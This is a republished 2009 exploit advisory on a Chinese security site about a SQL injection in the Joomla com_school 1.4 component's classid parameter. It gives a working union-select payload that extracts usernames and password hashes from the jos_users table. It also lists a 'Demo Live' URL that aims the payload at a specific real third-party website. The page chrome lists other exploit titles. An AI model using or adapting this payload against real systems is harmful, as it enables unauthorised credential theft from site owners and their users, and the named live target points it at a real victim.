首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-06-10  
----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

 <Sql Code>:
 -null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
 

Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>

# [2009-06-08]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·fipsCMS Light 2.1 (db.mdb) Rem
·Virtue Classifieds (category)
·VT-Auth 1.0 (zHk8dEes3.txt) Fi
·Virtue Book Store (cid) Remote
·linux/x86 bindport 8000 & add
·Virtue Shopping Mall (cid) Rem
·linux/x86 bindport 8000 & exec
·Interlogy Profile Manager Basi
·MyCars Automotive (Auth Bypass
·Apple MACOS X xnu <= 1228.9.59
·httpdx <= 0.8 FTP Server Delet
·Joomla Component MooFAQ (com_m
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved